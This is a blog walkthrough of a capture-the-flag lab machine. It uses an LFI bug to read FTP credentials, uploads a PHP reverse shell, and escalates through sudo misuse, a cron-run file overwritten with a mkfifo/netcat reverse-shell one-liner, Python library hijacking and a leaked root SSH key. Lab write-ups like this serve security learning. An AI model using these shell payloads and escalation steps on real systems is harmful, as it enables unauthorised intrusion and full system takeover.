Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

Image

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu Apr 15 06:03:39 2021 as: nmap -sC -sV -oA nmap 10.10.90.237
Nmap scan report for 10.10.90.237
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 15 06:05:02 2021 -- 1 IP address (1 host up) scanned in 83.77 seconds

3 open ports FTP,SSH and HTTP checking FTP first.

Image

Yea no anonymous logins allow now let hit port HTTP which is 80.

Image

Always check robots.txt.

Image

Cool we got the 1st flag and some secret txt file again.

Image

Yes i know i hide the flag let move on with the secret txt file but when i try to check the ` /secret_file_do_not_read.txt` 403 forbidden ahhhh why ok let go back to the homepage.

image

Back to the homepage clicking on one of the post i notice the URL was looking strange probably is it vulnerable to LFI or RCE come on let give it a try.

Image

And boom we got some LFI vulnerability in the house.

Image

Now let try reading the /secret_file_do_not_read.txt with the LFI.

Image

Cool some FTP details now let hit FTP back.

Image

Boom flag2 retrieve now let check the files folder but it was empty let try to put some reverse shell in it and give it permission chmod 777 rev.php.

image

Hi Mat, The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.

So we know the folder our reverse shell is save in now let start an ncat listener nc -nvlp 4444 .

Image

Accessing the reverse shell path give us back a shell back to our terminal.

Image

Image

Spawing a TTY shell you can check out my cheat sheet here Spawing TTY Shell .

image

python3 -c 'import pty; pty.spawn ("/bin/bash")'

image

And we have flag3 also now let check the home directory but we have no access to any file now let try sudo -l .

Image

Cool our way to user toby now type sudo -u toby /bin/sh and we are toby.

Image

Done with flag4.

Image

Cool another note let read it.

image

Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

Mat

image

Cool we have write permission on the file let echo our reverse shell payload in it rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f and start our ncat listener and in 1 min we have our shell smiling back to us.

Image

A note again cool let check it out fast.

image

Cool so i cd to the script directory and yes it something interesting.

Image

Going through the script i found out it using the cmd.py module to get command and lucky for us we have write permission to the cmd.py module library which can lead to python library hijacking.

Image

NOW LET ABUSE IT

import subprocess

result = subprocess.run(['/bin/bash'])

Image

Now let run our sudo command sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py * and boom we are user Will.

Image

And we are done with the flag6 time to move to root checking the opt folder we found a backups folder some base64 strings let try to decode it with cyber chef.

Image

And boom we have root RSA Private key now let save it to a file and give it the chmod 600 id_rsa permission.

Image

And boom flag7 done and we are root box rooted.

Image

Greeting From Muzec



Back To Home